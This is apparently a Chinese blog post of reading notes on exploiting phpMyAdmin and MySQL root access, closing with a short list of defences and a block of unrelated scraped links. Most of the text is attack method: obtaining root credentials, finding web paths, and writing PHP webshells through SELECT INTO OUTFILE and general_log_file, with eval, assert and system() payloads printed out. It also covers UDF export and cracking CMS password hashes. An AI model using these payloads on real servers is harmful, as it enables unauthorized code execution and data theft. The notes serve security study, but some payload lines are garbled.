读书笔记1-10                                                             phpMyAdmin漏洞利用与安全防范

phpMyAdmin功能强大,可执行命令,导入导出数据库,但如果存在设置root密码过于简单,就可以获取webshell,甚至服务器权限。phpMyAdmin在一些流行架构中大量使用,如phpstudy,phpnow,wammp,lamp,xamp等,这些架构默认密码root,如未修改,极易被渗透。

MySQL root账号密码获取思路

1 源代码泄露

在有的CMS系统中,对config.inc.php及config.php等数据库配置文件进行编辑时,有可能直接生成bak文件,这些文件可直接读取和下载,很多使用phpmyadmin的网站村目录泄露,通过目录信息泄露,可下载源代码等打包文件,查看这些打包文件可获取源码中数据库配置文件位置,从而获取root账号密码,建议从rar,他人,gz文件中搜集跟进中config,db等

2 暴力破解

使用burpsuite等暴力破解,甚至可以通过不同字典对单个ip或多个url进行暴力破解

3 其他方式

如通过社工邮件账号

获取网站真实路径

1 最直接获取网站真实路径的方法是通过phpinfo.php,即phpinfo()函数,其页面会显示网站真实路径

2 出错页面获取,有些代码文件直接访问会报错,包含真实物理路径,通过构造不存在页面,或访问存在目录信息泄露的代码文件执行出错来获取真实路径。

3 load_file函数读取网站配置信息,通过mysql的load_file函数读取配置文

4 在一些CMS系统中,有些会保存网站配置信息或路径信息,通过phpmyadmin登录后,在数据库查找CMS表及保存文件地址的表即可

5 进入后台查看,有些系统会在后台生成网站运行基本情况

6 通过百度、zoomeye,shadon等搜索error,warning等,也可通过快照或访问页面来获取

site:anti36.com error

site:ait36.com warning

MYSQL账号webshell获取思路,1,2,6,8较佳

1 通过程序报错,phhpinfo函数和程序配置表等直接获取网站真实路径,有些网站被渗透过,在目录下留有后门,通过load_file可以直接读取

2 直接导出一句话后门,前提要知道网站真实路径,如网站真实路径D:/WORK/WWW,则可通过如下命令获取一句话后门文件antian365.php

select '<?php @eval($_POST[antian365]);?>' INTO OUTILE 'D:/WORK/WWW/antian365.php'

3 创建数据库导出一句话后门,在查询窗口直接执行以下代码即可,思路为创一个表和字段,插入一个 '<?php @eval($_POST[antian365]);?>',然后再和方法二里从表中提取即可

4 可执行命令方式,创建执行命令形式的shell,但前提是对方未关闭系统函数,该方法成功后可以直接执行DOS命令,使用方法www.xx.com/antian365.php?cmd=要执行的命令,select '<?php echo \'<pre>\';system($_GET[\'\cmd']);echo \'</pre>\;?)>' INTO OUTFILE 'd:/www/antian365.php'  命令为获取cmd后参数并执行并写入php文件

5 过杀毒软件的方式

6 直接导出加密webshell

7 有时无法获取网站真实路径,意味无法直接导出一句话webshell,可通过CMS系统管理账号登录系统后,寻找漏洞来突破,如dedecms可通过破解管理员账号后直接上传文件获取webshell。discuz!的uc_key可用直接获取webshell,甚至某些系统可以直接上传php文件,如下的一些cms系统渗透技巧。

a  dedecms系统密码有md5格式密码,也有20位密码如果是20位密码则需去除密码中前3位和最后1位,再对剩下的值进行md5解密即可。

b  phpcms v9版本密码需要加salt进行破解,需要选择破解算法md5(md5($pass).$salt)进行破解

c discuz!论坛账号保存在ucenter_members(DISCUZ!7.x及以上版本)或cdb_members(DISCUZ!6.x版本)其破解需要带salt进行,破解时是使用password:salt进行破解

8  mysql root账号general_log_file方法获取webshell

a  查看genera 文件配置情况 show global variables like "%genera%"

b 关闭general_log set global general_log=off;:

c 通过general_log选项来获取webshell

set global general_log='on';

set global general_log_file='d:/phpstudy/www/cmd.php'

select '<?php assert($_post["cmd"]);?>';

shell为cmd.php,一句话后门,密码为cmd

10.4 无法通过phpadmin直接获取webshell

如果前边思路仍无法获取webshell,则可以采取以下方法和思路

1 连接mysql

a  直接通过mysql程序连接    b  通过phpmyadmin连接   c  通过navicat for mysql连接

2 查看数据库版本和数据库路径

select  version()

select @@datadir;

3 直接将udf文件导出为mysqldll

10.5 phpmyadmin 漏洞防范方法

1 使用phpinfo查看环境变量后,用后尽量删除,避免泄露真实路径

2 使用lamp框架安装时,需要修改器默认root账号对应的弱口令root,以及admin/wdlinux.cn

3 lamp集成了proftpd,默认用户nobody,密码lamp,安装后也需修改

4 如果不是经常使用phpmyadmin,安装后可删除

5 严格目录写权限,除文件上传目录允许写权限外,其他文件及目录在完成配置后将禁止写权限,并做上传目录后去除执行权限

6 部署系统运行后,删除上传无关文件,不在网站进行源代码打包,以及导出数据库文件,即使要打包备份,也使用强密码加密

7 设置root口令为强口令

8 不知网站数据库连接配置文件中配置root账号,而是单独建立一个数据库用户,给予最低权限即可,各个cms数据库和系统相对独立

9 定期检查mysql数据库中user表中是否存在“%”的情况,plugin中是否存在不是自定义的函数,禁用plugin目录写入权限。

2021-04-29-读书笔记1-10-phpMyAdmin漏洞利用与安全防范相关推荐

  1. 2021.04.29删点成林

    2021.04.29删点成林 (题目来源:https://leetcode-cn.com/problems/delete-nodes-and-return-forest/) 题目描述 给出二叉树的根节 ...

  2. 《增强现实:原理、算法与应用》读书笔记(10)视觉惯性SLAM

    <增强现实:原理.算法与应用>读书笔记(10)视觉惯性SLAM 单目视觉SLAM系统存在一定的局限性,它非常依赖相机的成像质量,在图像质量不佳的时候则难以正常工作.即使图像质量很好,缺乏尺 ...

  3. 《写给企业家的经济学》读书笔记 - Part 10

    申明!非经本人同意,任何人与单位不得转载! 书名:<写给企业家的经济学> 作者:梁小民 读书时间:2006年7月 内容归类:经济学 内容简介:这是一本专门写给现在和未来企业家的经济学普及读 ...

  4. PMP读书笔记(第10章)

    大家好,我是烤鸭:     今天做一个PMP的读书笔记. 第十章 项目沟通管理 项目沟通管理 项目沟通管理的核心概念 项目沟通管理的趋势和新兴实践 裁剪考虑因素 在敏捷或适应型环境中需要考虑的因素 1 ...

  5. 电磁兼容工程(Electromagnetic compatibility engineering Herry Ott )读书笔记-- 章10 数字电路接地

    1, 发现Henry W Ott 写的<电磁兼容工程>是一本非常好的关于电磁兼容的书,强烈推荐. 强烈推荐英文版,虽然国内有翻译版,但是本人体验是英文版本更容易读懂. 2,本博客是这本书的 ...

  6. 【Effection C++】读书笔记 条款10~条款12

    [Effection C++]读书笔记 Part2 构造/析构/赋值运算 条款09:绝不在构造和析构函数中调用virtual函数 构造函数和析构函数期间不要调用virtual函数,虽然语法上并不会有错 ...

  7. 《Effective C#》读书笔记——条目10:使用可选参数减少方法重载的数量C#语言习惯...

    C#4.0 引入了具名参数(MSDN翻译为"命名实参",个人认为具名参数更形象,可选参数亦是)和可选参数(可选实参).客户端代码使用具名参数意味着:方法中的参数名称也成为了公有接口 ...

  8. 《Effective C艹》读书笔记(10)

    条款14:在资源管理类中小心copy行为 修改了一下书中代码(参考http://www.cnblogs.com/jerry19880126/archive/2013/05/25/3098997.htm ...

  9. CSharp设计模式读书笔记(10):装饰模式(学习难度:★★★☆☆,使用频率:★★★☆☆)...

    装饰模式(Decorator Pattern): 动态地给一个对象增加一些额外的职责,就增加对象功能来说,装饰模式比生成子类实现更为灵活. 模式角色与结构: 示例代码: using System; u ...

最新文章

  1. 计算机科学与技术第6次上机实验报告,计算机科学与技术第次实验报告-20210602214116.docx-原创力文档...
  2. 提取pfx证书公钥和私钥
  3. ----斐波那契数列---eval函数----类递归思想 栈 进出 思想
  4. python的继承用法_python之继承中组合用法与菱形继承关系查找法
  5. 执行脚本出现bin/bash: bad interpreter: No such file or d
  6. 禅道批量删除bug_写代码有这16个好习惯,可以减少80%非业务的bug
  7. 第 89 章 Hardware
  8. 美国visa虚拟信用卡
  9. 腾讯java笔试题_腾讯java笔试题
  10. 基于CDD修复模型的图像修复算法
  11. MOOC-浙江大学-博弈论基础-学习笔记(四)
  12. HCIP第十六天(VLAN IF接口,STP生成树协议,BPDU的配置)
  13. buu firmware
  14. docker容器中配置文件修改错误,导致容器无法启动
  15. 防火墙技术及其在校园网中的设计方案
  16. 极客时间_软件设计之美 笔记
  17. 树莓派与Arduino串口通讯获取DH11温湿度
  18. CVE-2018-8120漏洞复现(提权)
  19. E-Prime心理学实验设计软件丨产品简介
  20. rewrite地址转换

热门文章

  1. 【图解UDS】UDS汽车诊断开发流程及Vector解决方案工具链介绍
  2. linux用用户默认密码是多少,useradd新建的用户默认密码是什么
  3. tpshop 后台的密码是多少?
  4. 51nod 1574 || Codeforces 584 E. Anton and Ira 思维+构造+贪心
  5. 从原理到实现丨手把手教你写一个线程池丨源码分析丨线程池内部组成及优化
  6. 【cocos2dx 3.x】画线
  7. uniapp仿飞书日程安排
  8. Android面试问题汇总
  9. Oracle 在存储过程或函数中执行字符串sql
  10. 苹果网页无法与服务器建立安全连接,iOS 9.3:发生SSL错误,无法建立与服务器的安全连接...